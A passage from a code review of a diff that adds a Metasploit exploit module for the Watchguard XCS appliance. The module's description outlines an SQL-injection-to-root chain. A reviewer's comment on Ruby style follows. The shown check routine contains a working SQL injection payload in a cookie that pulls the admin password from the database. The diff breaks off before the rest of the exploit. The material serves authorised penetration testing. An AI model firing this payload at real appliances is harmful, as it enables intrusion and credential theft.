modules/exploits/freebsd/http/watchguard_remote_root.rb

```diff
@@ -0,0 +1,273 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+          'Name'           => 'Watchguard XCS Unauthenticated Remote Root',
+          'Description'    => %q{
+          This module exploits three seperate vulnerabilities found in the Watchguard XCS virtual appliance
+          to gain a root shell. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
+          a valid web user into the appliance database, and login to the web interface as this user. A
+          vulnerability in the web interface allows the attack to inject operating system commands as the
+          'nobody' user. A further vulnerability in the 'FixCorruptMail' script called by root's crontab can then be exploited
+          to run a command as root within 3 minutes.
+          },
+          'Author'         =>
+          [
+          'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
+          ],
+          'License'        => MSF_LICENSE,
+          'References'     =>
+          [
+            ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
+          ],
+          'Platform'       => 'bsd',
+          'Arch'           => ARCH_X86_64,
+          'Privileged'     => false,
+          'Targets'        =>
+          [
+            [ 'Watchguard XCS 9.2/10.0', { }]
+          ],
+          'DefaultOptions' =>
+          {
+            'SSL' => true
+          },
+          'DefaultTarget'  => 0,
+          'DisclosureDate' => 'Jun 29 2015'
+          ))
+
+    register_options(
+        [
+        OptString.new('TARGETURI', [true, 'The target URI', '/']),
+        OptBool.new('GETROOT', [false, 'Exploit the root privesc (Takes up to 180 seconds)', true]),
+        Opt::RPORT(443)
+        ],
+        self.class
+        )
+    end
+
+    def check
+    #Check to see if the SQLi is exploitable
+      res = send_request_cgi({
+         'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
+         'cookie' => "sid=1 AND 1=CAST((select password from sds_users where login='admin' limit 1) as int)"
+         })
+     uri1 = normalize_uri(target_uri.path, '/borderpost/imp/compose.php3')
+     if res and res.body =~ /invalid input syntax for integer/
+       vprint_status("Looks vulnerable to the SQLi issue, probably fully vulnerable")
+       return Exploit::CheckCode::Vulnerable
+     else
```

Comment:
No `else` required here as the `if` statement returns. Better still, use the `if` as the final expression:

``` ruby
if res and ...
  Exploit::CheckCode::Vulnerable
else
  Exploit::CheckCode::Safe
end
```